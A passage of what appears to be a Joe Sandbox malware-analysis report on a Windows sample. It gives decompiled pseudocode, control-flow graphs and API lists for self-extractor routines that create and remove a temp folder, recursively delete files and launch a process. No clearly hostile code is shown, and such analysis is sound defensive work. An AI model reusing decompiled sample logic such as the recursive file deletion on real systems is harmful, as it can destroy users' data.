                                                                                                                                                                                                                                            • API String ID: 2126469477-58291647
                                                                                                                                                                                                                                            • Opcode ID: 75b99f046754c64bdcbbe05bb4befecc7bfcac266eb742d2e12816c2a54fa077
                                                                                                                                                                                                                                            • Instruction ID: 1ebaf93157e49c16aafbaa4a045952da91fb34928dfddad588fe0c53567e3652
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b99f046754c64bdcbbe05bb4befecc7bfcac266eb742d2e12816c2a54fa077
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC41D83EA002159BDF30EBB5AD4576B33A8DBE6790F100275E901C2191EFB5CE86CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 522 a45467-a45484 523 a4551c-a45528 call a41680 522->523 524 a4548a-a45490 call a453a1 522->524 528 a4552d-a45539 call a458c8 523->528 527 a45495-a45497 524->527 529 a45581-a45583 527->529 530 a4549d-a454c0 call a41781 527->530 537 a4554d-a45552 528->537 538 a4553b-a45545 CreateDirectoryA 528->538 532 a4558d-a4559d call a46ce0 529->532 539 a454c2-a454d8 GetSystemInfo 530->539 540 a4550c-a4551a call a4658a 530->540 544 a45554-a45557 call a4597d 537->544 545 a45585-a4558b 537->545 542 a45577-a4557c call a46285 538->542 543 a45547 538->543 548 a454fe 539->548 549 a454da-a454dd 539->549 540->528 542->529 543->537 555 a4555c-a4555e 544->555 545->532 556 a45503-a45507 call a4658a 548->556 553 a454f7-a454fc 549->553 554 a454df-a454e2 549->554 553->556 557 a454e4-a454e7 554->557 558 a454f0-a454f5 554->558 555->545 559 a45560-a45566 555->559 556->540 557->540 561 a454e9-a454ee 557->561 558->556 559->529 562 a45568-a45575 RemoveDirectoryA 559->562 561->556 562->529
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A45467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0xa491e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A41680(0xa491e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E00A458C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00A46CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E00A4597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0xa48a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0xa48a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa48a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E00A453A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0xa491e4;
                                                                                                                                                                                                                                            				E00A41781(0xa491e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0xa49a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A4658A(_t48, 0x104, 0xa41140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E00A4658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x00a45472
                                                                                                                                                                                                                                            0x00a45479
                                                                                                                                                                                                                                            0x00a45481
                                                                                                                                                                                                                                            0x00a45484
                                                                                                                                                                                                                                            0x00a4551c
                                                                                                                                                                                                                                            0x00a45521
                                                                                                                                                                                                                                            0x00a45528
                                                                                                                                                                                                                                            0x00a4552d
                                                                                                                                                                                                                                            0x00a4552f
                                                                                                                                                                                                                                            0x00a45539
                                                                                                                                                                                                                                            0x00a4554d
                                                                                                                                                                                                                                            0x00a4554d
                                                                                                                                                                                                                                            0x00a45552
                                                                                                                                                                                                                                            0x00a45585
                                                                                                                                                                                                                                            0x00a45585
                                                                                                                                                                                                                                            0x00a4558b
                                                                                                                                                                                                                                            0x00a4558d
                                                                                                                                                                                                                                            0x00a4559d
                                                                                                                                                                                                                                            0x00a4559d
                                                                                                                                                                                                                                            0x00a45557
                                                                                                                                                                                                                                            0x00a4555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45560
                                                                                                                                                                                                                                            0x00a45566
                                                                                                                                                                                                                                            0x00a45569
                                                                                                                                                                                                                                            0x00a4556f
                                                                                                                                                                                                                                            0x00a4556f
                                                                                                                                                                                                                                            0x00a45581
                                                                                                                                                                                                                                            0x00a45581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45581
                                                                                                                                                                                                                                            0x00a45545
                                                                                                                                                                                                                                            0x00a4557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4557c
                                                                                                                                                                                                                                            0x00a45547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45547
                                                                                                                                                                                                                                            0x00a4548a
                                                                                                                                                                                                                                            0x00a45490
                                                                                                                                                                                                                                            0x00a45497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4549d
                                                                                                                                                                                                                                            0x00a454ab
                                                                                                                                                                                                                                            0x00a454b4
                                                                                                                                                                                                                                            0x00a454c0
                                                                                                                                                                                                                                            0x00a4550c
                                                                                                                                                                                                                                            0x00a45511
                                                                                                                                                                                                                                            0x00a45515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45515
                                                                                                                                                                                                                                            0x00a454c9
                                                                                                                                                                                                                                            0x00a454d6
                                                                                                                                                                                                                                            0x00a454d8
                                                                                                                                                                                                                                            0x00a454fe
                                                                                                                                                                                                                                            0x00a45503
                                                                                                                                                                                                                                            0x00a45507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45507
                                                                                                                                                                                                                                            0x00a454da
                                                                                                                                                                                                                                            0x00a454dd
                                                                                                                                                                                                                                            0x00a454f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454f7
                                                                                                                                                                                                                                            0x00a454df
                                                                                                                                                                                                                                            0x00a454e2
                                                                                                                                                                                                                                            0x00a454f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454f0
                                                                                                                                                                                                                                            0x00a454e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a454e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A454C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4556F
                                                                                                                                                                                                                                              • Part of subcall function 00A453A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A453FB
                                                                                                                                                                                                                                              • Part of subcall function 00A453A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45402
                                                                                                                                                                                                                                              • Part of subcall function 00A453A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4541F
                                                                                                                                                                                                                                              • Part of subcall function 00A453A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4542B
                                                                                                                                                                                                                                              • Part of subcall function 00A453A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-186922987
                                                                                                                                                                                                                                            • Opcode ID: 5a147d5240c76f8bd5f771b87e8610db4686af84957e8b50902e0adc2b61ebc6
                                                                                                                                                                                                                                            • Instruction ID: 6e7847f39e6ee8b8cad8d4a36ff768026f157428d17f347c5e6ba8016a7bfb96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a147d5240c76f8bd5f771b87e8610db4686af84957e8b50902e0adc2b61ebc6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E314D7DF00A046BCB14EFB9AD4457F77ABABC2740F14012AA402D6642DF71CE528693
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A42390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00A46CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A41680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E00A416B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00A41680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E00A416B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E00A416B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E00A4658A( &_v280, 0x104, 0xa41140);
                                                                                                                                                                                                                                            								E00A42390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x00a42398
                                                                                                                                                                                                                                            0x00a4239e
                                                                                                                                                                                                                                            0x00a423a3
                                                                                                                                                                                                                                            0x00a423a5
                                                                                                                                                                                                                                            0x00a423ae
                                                                                                                                                                                                                                            0x00a423b3
                                                                                                                                                                                                                                            0x00a424cb
                                                                                                                                                                                                                                            0x00a424d2
                                                                                                                                                                                                                                            0x00a424d3
                                                                                                                                                                                                                                            0x00a424d4
                                                                                                                                                                                                                                            0x00a424df
                                                                                                                                                                                                                                            0x00a423c2
                                                                                                                                                                                                                                            0x00a423d1
                                                                                                                                                                                                                                            0x00a423db
                                                                                                                                                                                                                                            0x00a423e4
                                                                                                                                                                                                                                            0x00a423f6
                                                                                                                                                                                                                                            0x00a423fc
                                                                                                                                                                                                                                            0x00a42401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42407
                                                                                                                                                                                                                                            0x00a42407
                                                                                                                                                                                                                                            0x00a42408
                                                                                                                                                                                                                                            0x00a42411
                                                                                                                                                                                                                                            0x00a4241f
                                                                                                                                                                                                                                            0x00a4247a
                                                                                                                                                                                                                                            0x00a42483
                                                                                                                                                                                                                                            0x00a42495
                                                                                                                                                                                                                                            0x00a424a3
                                                                                                                                                                                                                                            0x00a42421
                                                                                                                                                                                                                                            0x00a4242f
                                                                                                                                                                                                                                            0x00a42453
                                                                                                                                                                                                                                            0x00a4245d
                                                                                                                                                                                                                                            0x00a42466
                                                                                                                                                                                                                                            0x00a42472
                                                                                                                                                                                                                                            0x00a42472
                                                                                                                                                                                                                                            0x00a4242f
                                                                                                                                                                                                                                            0x00a424af
                                                                                                                                                                                                                                            0x00a424b5
                                                                                                                                                                                                                                            0x00a424be
                                                                                                                                                                                                                                            0x00a424c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a424c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A48A3A,00A411F4,00A48A3A,00000000,?,?), ref: 00A423F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A411F8), ref: 00A42427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A411FC), ref: 00A4243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A42495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A424A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A424AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A424BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A48A3A), ref: 00A424C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: f462d6ef5236b1f824578e65bb8075355e472bc44e1e20c364b4229bc081c22e
                                                                                                                                                                                                                                            • Instruction ID: 551320749d09c588694c99dc19d245e6f1bea2b4d3f1ce39d98cb74f3cd50efd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f462d6ef5236b1f824578e65bb8075355e472bc44e1e20c364b4229bc081c22e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731B33D204740ABC320EBE8DD89BEBB3ACEFC5305F44492DB55586290EB74994DC752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 a43fef-a44010 676 a44016-a4403b CreateProcessA 675->676 677 a4410a-a4411a call a46ce0 675->677 678 a440c4-a44101 call a46285 GetLastError FormatMessageA call a444b9 676->678 679 a44041-a4406e WaitForSingleObject GetExitCodeProcess 676->679 693 a44106 678->693 682 a44070-a44077 679->682 683 a44091 call a4411b 679->683 682->683 687 a44079-a4407b 682->687 688 a44096-a440b8 CloseHandle * 2 683->688 687->683 690 a4407d-a44089 687->690 691 a44108 688->691 692 a440ba-a440c0 688->692 690->683 694 a4408b 690->694 691->677 692->691 695 a440c2 692->695 693->691 694->683 695->693
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A43FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A46CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa48a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa49a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa49a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A4411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa49a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a43fef
                                                                                                                                                                                                                                            0x00a43ffa
                                                                                                                                                                                                                                            0x00a44001
                                                                                                                                                                                                                                            0x00a44008
                                                                                                                                                                                                                                            0x00a4400a
                                                                                                                                                                                                                                            0x00a4400b
                                                                                                                                                                                                                                            0x00a44010
                                                                                                                                                                                                                                            0x00a4410a
                                                                                                                                                                                                                                            0x00a4411a
                                                                                                                                                                                                                                            0x00a4411a
                                                                                                                                                                                                                                            0x00a4401c
                                                                                                                                                                                                                                            0x00a4401d
                                                                                                                                                                                                                                            0x00a4401e
                                                                                                                                                                                                                                            0x00a4401f
                                                                                                                                                                                                                                            0x00a44033
                                                                                                                                                                                                                                            0x00a4403b
                                                                                                                                                                                                                                            0x00a440ca
                                                                                                                                                                                                                                            0x00a440e9
                                                                                                                                                                                                                                            0x00a440f8
                                                                                                                                                                                                                                            0x00a44101
                                                                                                                                                                                                                                            0x00a44106
                                                                                                                                                                                                                                            0x00a44106
                                                                                                                                                                                                                                            0x00a44108
                                                                                                                                                                                                                                            0x00a44108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44108
                                                                                                                                                                                                                                            0x00a44049
                                                                                                                                                                                                                                            0x00a4405c
                                                                                                                                                                                                                                            0x00a44062
                                                                                                                                                                                                                                            0x00a44068
                                                                                                                                                                                                                                            0x00a4406e
                                                                                                                                                                                                                                            0x00a44070
                                                                                                                                                                                                                                            0x00a44077
                                                                                                                                                                                                                                            0x00a4407f
                                                                                                                                                                                                                                            0x00a44089
                                                                                                                                                                                                                                            0x00a4408b
                                                                                                                                                                                                                                            0x00a4408b
                                                                                                                                                                                                                                            0x00a44089
                                                                                                                                                                                                                                            0x00a44077
                                                                                                                                                                                                                                            0x00a44091
                                                                                                                                                                                                                                            0x00a4409c
                                                                                                                                                                                                                                            0x00a440a8
                                                                                                                                                                                                                                            0x00a440b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a440c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a440c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00A44033
